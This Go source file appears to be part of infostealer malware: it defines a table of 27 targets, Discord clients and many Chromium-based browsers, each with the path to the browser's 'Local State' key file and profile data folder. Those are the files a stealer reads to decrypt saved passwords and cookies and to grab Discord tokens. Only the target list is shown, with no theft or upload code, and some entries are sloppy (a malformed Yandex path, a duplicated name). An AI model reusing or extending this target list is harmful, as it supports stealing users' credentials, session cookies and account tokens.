package main

type PLATFORM struct {
	Chromium   bool
	LocalState string
	DataFiles  string
	Name       string
}

// literally just a list of chromium browsers
var (
	PLATFORMS = [27]PLATFORM{
		{Chromium: false,
			DataFiles: ROAMING + "\\discord",
			Name:      "discord",
		},
		{Chromium: false,
			DataFiles: ROAMING + "\\discordcanary",
			Name:      "discord_canary",
		},
		{Chromium: false,
			DataFiles: ROAMING + "\\discordptb",
			Name:      "discord_ptb",
		},
		{Chromium: true,
			LocalState: ROAMING + "\\Opera Software\\Opera Stable\\Local State",
			DataFiles:  ROAMING + "\\Opera Software\\Opera Stable",
			Name:       "opera",
		},
		{Chromium: true,
			LocalState: LOCAL + "\\BraveSoftware\\Brave-Browser\\User Data\\Local State",
			DataFiles:  LOCAL + "\\BraveSoftware\\Brave-Browser\\User Data\\Default",
			Name:       "brave",
		},
		{Chromium: true,
			LocalState: ROAMING + "\\Opera Software\\Opera GX Stable\\Local State",
			DataFiles:  ROAMING + "\\Opera Software\\Opera GX Stable",
			Name:       "opera_gx",
		},
		{Chromium: true,
			LocalState: LOCAL + "\\Google\\Chrome\\User Data\\Local State",
			DataFiles:  LOCAL + "\\Google\\Chrome\\User Data\\Default",
			Name:       "chrome",
		},
		{Chromium: true,
			LocalState: LOCAL + "\\Yandex\\YandexBrowser\\User \\Local State",
			DataFiles:  LOCAL + "\\Yandex\\YandexBrowser\\User Data\\Default",
			Name:       "yandex",
		},
		{Chromium: true,
			LocalState: LOCAL + "\\Chromium\\User Data\\Local State",
			DataFiles:  LOCAL + "\\Chromium\\User Data\\Default",
			Name:       "chromium",
		},
		{Chromium: true,
			LocalState: LOCAL + "\\Epic Privacy Browser\\User Data\\Local State",
			DataFiles:  LOCAL + "\\Epic Privacy Browser\\User Data\\Default",
			Name:       "epic_privacy_browser",
		},
		{Chromium: true,
			LocalState: LOCAL + "\\Amigo\\User Data\\Local State",
			DataFiles:  LOCAL + "\\Amigo\\User Data\\Default",
			Name:       "amigo",
		},
		{Chromium: true,
			LocalState: LOCAL + "\\Vivaldi\\User Data\\Local State",
			DataFiles:  LOCAL + "\\Vivaldi\\User Data\\Default",
			Name:       "vivaldi",
		},
		{Chromium: true,
			LocalState: LOCAL + "\\Orbitum\\User Data\\Local State",
			DataFiles:  LOCAL + "\\Orbitum\\User Data\\Default",
			Name:       "orbitum",
		},
		{Chromium: true,
			LocalState: LOCAL + "\\Mail.Ru\\Atom\\User Data\\Local State",
			DataFiles:  LOCAL + "\\Mail.Ru\\Atom\\User Data\\Default",
			Name:       "atom",
		},
		{Chromium: true,
			LocalState: LOCAL + "\\Kometa\\User Data\\Local State",
			DataFiles:  LOCAL + "\\Kometa\\User Data\\Default",
			Name:       "kometa",
		},
		{Chromium: true,
			LocalState: LOCAL + "\\Comodo\\Dragon\\User Data\\Local State",
			DataFiles:  LOCAL + "\\Comodo\\Dragon\\User Data\\Default",
			Name:       "comodo",
		},
		{Chromium: true,
			LocalState: LOCAL + "\\Torch\\User Data\\Local State",
			DataFiles:  LOCAL + "\\Torch\\User Data\\Default",
			Name:       "torch",
		},
		{Chromium: true,
			LocalState: LOCAL + "\\Comodo\\User Data\\Local State",
			DataFiles:  LOCAL + "\\Comodo\\User Data\\Default",
			Name:       "comodo",
		},
		{Chromium: true,
			LocalState: LOCAL + "\\Slimjet\\User Data\\Local State",
			DataFiles:  LOCAL + "\\Slimjet\\User Data\\Default",
			Name:       "slimjet",
		},
		{Chromium: true,
			LocalState: LOCAL + "\\360Browser\\Browser\\User Data\\Local State",
			DataFiles:  LOCAL + "\\360Browser\\Browser\\User Data\\Default",
			Name:       "360browser",
		},
		{Chromium: true,
			LocalState: LOCAL + "\\Maxthon3\\User Data\\Local State",
			DataFiles:  LOCAL + "\\Maxthon3\\User Data\\Default",
			Name:       "maxthon3",
		},
		{Chromium: true,
			LocalState: LOCAL + "\\K-Meleon\\User Data\\Local State",
			DataFiles:  LOCAL + "\\K-Meleon\\User Data\\Default",
			Name:       "k_meleon",
		},
		{Chromium: true,
			LocalState: LOCAL + "\\Sputnik\\Sputnik\\User Data\\Local State",
			DataFiles:  LOCAL + "\\Sputnik\\Sputnik\\User Data\\Default",
			Name:       "sputnik",
		},
		{Chromium: true,
			LocalState: LOCAL + "\\Nichrome\\User Data\\Local State",
			DataFiles:  LOCAL + "\\Nichrome\\User Data\\Default",
			Name:       "nichrome",
		},
		{Chromium: true,
			LocalState: LOCAL + "\\CocCoc\\Browser\\User Data\\Local State",
			DataFiles:  LOCAL + "\\CocCoc\\Browser\\User Data\\Default",
			Name:       "coco",
		},
		{Chromium: true,
			LocalState: LOCAL + "\\uCozMedia\\Uran\\User Data\\Local State",
			DataFiles:  LOCAL + "\\uCozMedia\\Uran\\User Data\\Default",
			Name:       "uran",
		},
		{Chromium: true,
			LocalState: LOCAL + "\\Chromodo\\User Data\\Local State",
			DataFiles:  LOCAL + "\\Chromodo\\User Data\\Default",
			Name:       "chromodo",
		},
	}
)
